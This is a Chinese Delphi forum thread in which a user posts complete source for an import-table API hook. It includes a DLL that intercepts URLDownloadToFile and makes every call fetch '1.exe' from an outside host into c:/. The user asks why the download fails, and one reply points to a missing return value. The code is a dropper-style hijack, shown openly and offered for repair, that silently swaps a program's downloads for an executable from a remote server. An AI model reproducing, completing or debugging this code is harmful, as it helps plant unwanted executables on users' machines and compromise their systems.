关于APIHOOK的问题,希望大家帮我修改,谢谢~~~~~ ( 积分: 100 )

  • 主题发起人 主题发起人 huangai93
  • 开始时间 开始时间
H

huangai93

Unregistered / Unconfirmed
GUEST, unregistred user!
跪求高手解决一下APIHOOK问题,希望帮修改<br>//-------------APIHOOK单元---------------------//<br>unit&nbsp;HookAPI;<br><br>interface<br><br>uses<br>&nbsp;&nbsp;Windows,&nbsp;Classes;<br>function&nbsp;LocateFunctionAddress(Code:&nbsp;Pointer):&nbsp;Pointer;<br>function&nbsp;RepointFunction(OldFunc,&nbsp;NewFunc:&nbsp;Pointer):&nbsp;Integer;<br><br>type&nbsp;//定义一个入口结构<br>&nbsp;&nbsp;PImage_Import_Entry&nbsp;=&nbsp;^Image_Import_Entry;<br>&nbsp;&nbsp;Image_Import_Entry&nbsp;=&nbsp;record<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Characteristics:&nbsp;DWORD;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;TimeDateStamp:&nbsp;DWORD;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MajorVersion:&nbsp;Word;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MinorVersion:&nbsp;Word;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Name:&nbsp;DWORD;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LookupTable:&nbsp;DWORD;<br>&nbsp;&nbsp;end;<br><br>type&nbsp;//定义一个跳转的结构<br>&nbsp;&nbsp;TImportCode&nbsp;=&nbsp;packed&nbsp;record<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;JumpInstruction:&nbsp;Word;&nbsp;//定义跳转指令jmp<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;AddressOfPointerToFunction:&nbsp;^Pointer;&nbsp;//定义要跳转到的函数<br>&nbsp;&nbsp;end;<br>&nbsp;&nbsp;PImportCode&nbsp;=&nbsp;^TImportCode;<br>implementation<br><br>function&nbsp;LocateFunctionAddress(Code:&nbsp;Pointer):&nbsp;Pointer;<br>var<br>&nbsp;&nbsp;func:&nbsp;PImportCode;<br>begin<br>&nbsp;&nbsp;Result&nbsp;:=&nbsp;Code;<br>&nbsp;&nbsp;if&nbsp;Code&nbsp;=&nbsp;nil&nbsp;then&nbsp;exit;<br>&nbsp;&nbsp;try<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;func&nbsp;:=&nbsp;code;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(func.JumpInstruction&nbsp;=&nbsp;$25FF)&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Result&nbsp;:=&nbsp;func.AddressOfPointerToFunction^;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;except<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Result&nbsp;:=&nbsp;nil;<br>&nbsp;&nbsp;end;<br>end;<br><br>function&nbsp;RepointFunction(OldFunc,&nbsp;NewFunc:&nbsp;Pointer):&nbsp;Integer;<br>var<br>&nbsp;&nbsp;IsDone:&nbsp;TList;<br>&nbsp;&nbsp;function&nbsp;RepointAddrInModule(hModule:&nbsp;THandle;&nbsp;OldFunc,&nbsp;NewFunc:&nbsp;Pointer):&nbsp;Integer;<br>&nbsp;&nbsp;var<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dos:&nbsp;PImageDosHeader;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT:&nbsp;PImageNTHeaders;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ImportDesc:&nbsp;PImage_Import_Entry;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;RVA:&nbsp;DWORD;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Func:&nbsp;^Pointer;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;DLL:&nbsp;string;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;f:&nbsp;Pointer;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;written:&nbsp;DWORD;<br>&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Result&nbsp;:=&nbsp;0;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dos&nbsp;:=&nbsp;Pointer(hModule);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;IsDone.IndexOf(Dos)&nbsp;&gt;=&nbsp;0&nbsp;then&nbsp;exit;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;IsDone.Add(Dos);<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;OldFunc&nbsp;:=&nbsp;LocateFunctionAddress(OldFunc);<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;IsBadReadPtr(Dos,&nbsp;SizeOf(TImageDosHeader))&nbsp;then&nbsp;exit;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;Dos.e_magic&nbsp;&lt;&gt;&nbsp;IMAGE_DOS_SIGNATURE&nbsp;then&nbsp;exit;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;:=&nbsp;Pointer(Integer(Dos)&nbsp;+&nbsp;dos._lfanew);<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;RVA&nbsp;:=&nbsp;NT^.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.VirtualAddress;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;RVA&nbsp;=&nbsp;0&nbsp;then&nbsp;exit;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ImportDesc&nbsp;:=&nbsp;pointer(integer(Dos)&nbsp;+&nbsp;RVA);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(ImportDesc^.Name&nbsp;&lt;&gt;&nbsp;0)&nbsp;do<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;DLL&nbsp;:=&nbsp;PChar(Integer(Dos)&nbsp;+&nbsp;ImportDesc^.Name);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;RepointAddrInModule(GetModuleHandle(PChar(DLL)),&nbsp;OldFunc,&nbsp;NewFunc);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Func&nbsp;:=&nbsp;Pointer(Integer(DOS)&nbsp;+&nbsp;ImportDesc.LookupTable);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;Func^&nbsp;&lt;&gt;&nbsp;nil&nbsp;do<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;f&nbsp;:=&nbsp;LocateFunctionAddress(Func^);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;f&nbsp;=&nbsp;OldFunc&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WriteProcessMemory(GetCurrentProcess,&nbsp;Func,&nbsp;@NewFunc,&nbsp;4,&nbsp;written);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;Written&nbsp;&gt;&nbsp;0&nbsp;then&nbsp;Inc(Result);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Inc(Func);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Inc(ImportDesc);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;end;<br><br>begin<br>&nbsp;&nbsp;IsDone&nbsp;:=&nbsp;TList.Create;<br>&nbsp;&nbsp;try<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Result&nbsp;:=&nbsp;RepointAddrInModule(GetModuleHandle(nil),&nbsp;OldFunc,&nbsp;NewFunc);<br>&nbsp;&nbsp;finally<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;IsDone.Free;<br>&nbsp;&nbsp;end;<br>end;<br><br>end.<br>//-------------------------APHOOK---------------------//<br>library&nbsp;Project2;<br><br>uses<br>&nbsp;&nbsp;SysUtils,<br>&nbsp;&nbsp;Classes,<br>&nbsp;&nbsp;windows,<br>&nbsp;&nbsp;urlmon,<br>&nbsp;&nbsp;HookAPI&nbsp;in&nbsp;'HookAPI.pas';<br>type<br>TURLDownloadToFile=function&nbsp;(Caller:&nbsp;IUnknown;&nbsp;URL:&nbsp;PChar;&nbsp;FileName:&nbsp;PChar;&nbsp;Reserved:&nbsp;DWORD;&nbsp;StatusCB:&nbsp;IBindStatusCallback):&nbsp;HResult;&nbsp;stdcall;<br>var<br>oldURLDownloadToFile:TURLDownloadToFile;<br>{$R&nbsp;*.res}<br>function&nbsp;myURLDownloadToFile(Caller:&nbsp;IUnknown;&nbsp;URL:&nbsp;PChar;&nbsp;FileName:&nbsp;PChar;&nbsp;Reserved:&nbsp;DWORD;&nbsp;StatusCB:&nbsp;IBindStatusCallback):integer;&nbsp;stdcall;<br>&nbsp;&nbsp;begin<br>&nbsp;&nbsp;oldURLDownloadToFile(nil,'http://935201.free3.77169.net/1.exe','c:/1.exe',0,nil);<br>&nbsp;&nbsp;end;<br>&nbsp;&nbsp;procedure&nbsp;api_hook;stdcall;<br>&nbsp;&nbsp;begin<br>&nbsp;&nbsp;if&nbsp;@oldURLDownloadToFile&nbsp;=&nbsp;nil&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@oldURLDownloadToFile&nbsp;:=&nbsp;LocateFunctionAddress(@URLDownloadToFile);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;RepointFunction(@oldURLDownloadToFile,&nbsp;@myURLDownloadToFile);<br>&nbsp;&nbsp;end;<br>exports&nbsp;api_hook;<br>begin<br>end.<br>最后通过控制台调用<br>program&nbsp;Project1;<br><br>uses<br>windows;<br>&nbsp;&nbsp;procedure&nbsp;api_hook;stdcall;external&nbsp;'Project2.dll';<br><br>{$R&nbsp;*.res}<br><br>begin<br>api_hook;<br>end.<br>为什么不能实现下载功能,求助如何解决问题,我很很感谢大家.
 
楼主你运行后出现什么情况?<br>我觉的你的myURLDownloadToFile怎么没有返回值呀?
 
您必须登录或注册才可回复。

Similar threads

I
APIHOOK
回复
0
查看
814
import
I
I
API HOOK
回复
0
查看
771
import
I
I
查看DLL中的Exports函数
回复
0
查看
641
import
I
I
Exe文件的修改
回复
0
查看
538
import
I
I
获取BIOS信息的一个单元
回复
0
查看
892
import
I
后退
顶部